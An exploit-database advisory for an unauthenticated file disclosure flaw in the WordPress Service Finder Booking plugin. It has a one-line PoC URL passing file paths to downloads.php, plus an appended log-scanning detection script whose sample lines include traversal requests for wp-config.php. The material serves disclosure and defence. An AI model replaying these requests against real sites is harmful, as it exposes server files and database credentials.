exploit-db-mirror/exploits/php/webapps/43475.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00


# Exploit Title: WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10
1. Description:
An unauthenticated user can access downloads.php and use it to disclose files on the server through the GET parameter 'file='. An attacker can also disclose wp-config or other files.
2. PoC:
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
3. Timeline:
- Jan 1, 2018: reported to vendor
- Jan 1, 2018: vendor sent email
- Jan 1, 2018: sent PoC
- Jan 2, 2018: vendor contacted team
- Jan 8, 2018: vendor sent email about the fixed issue
4. Solution:
Update to version 3.2.
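
Detection sketch for the issue described above, added here as an example and not part of the original advisory: it scans web access logs for requests to the downloads.php endpoint from the PoC whose 'file' value is an absolute path, contains a parent-directory step, or names PHP source or wp-config. The combined log format, the three heuristics and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter name come from the advisory's PoC URL.
ENDPOINT = "/wp-content/plugins/sf-booking/lib/downloads.php"
PARAM = "file"
# Assumed log format: Apache/nginx "combined".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(value):
    """Return the reasons a 'file' value looks like a disclosure attempt."""
    prev = None
    while prev != value:  # decode until stable so nested encoding is normalised
        prev, value = value, unquote(value)
    value = value.replace("\\", "/").lower()
    reasons = []
    if value.startswith("/") or re.match(r"[a-z]:/", value):
        reasons.append("absolute-path")
    if ".." in value.split("/"):
        reasons.append("traversal")
    if value.endswith(".php") or "wp-config" in value:
        reasons.append("source-or-config")
    return reasons

def scan(lines):
    """Return (ip, status, file_value, reasons) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if unquote(url.path).lower() != ENDPOINT:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            reasons = classify(value)
            if reasons:
                hits.append((m.group("ip"), int(m.group("status")), value, reasons))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [09/Jan/2018:10:00:01 +0700] "GET /wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php HTTP/1.1" 200 412 "-" "-"',
    '203.0.113.7 - - [09/Jan/2018:10:00:04 +0700] "GET /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "-"',
    '198.51.100.20 - - [09/Jan/2018:10:02:11 +0700] "GET /wp-content/plugins/sf-booking/lib/downloads.php?file=invoice-1042.pdf HTTP/1.1" 200 88211 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A flagged request that returned status 200 means the file was likely served; if the value names wp-config, treat the database credentials and salts in it as exposed and rotate them after updating to 3.2.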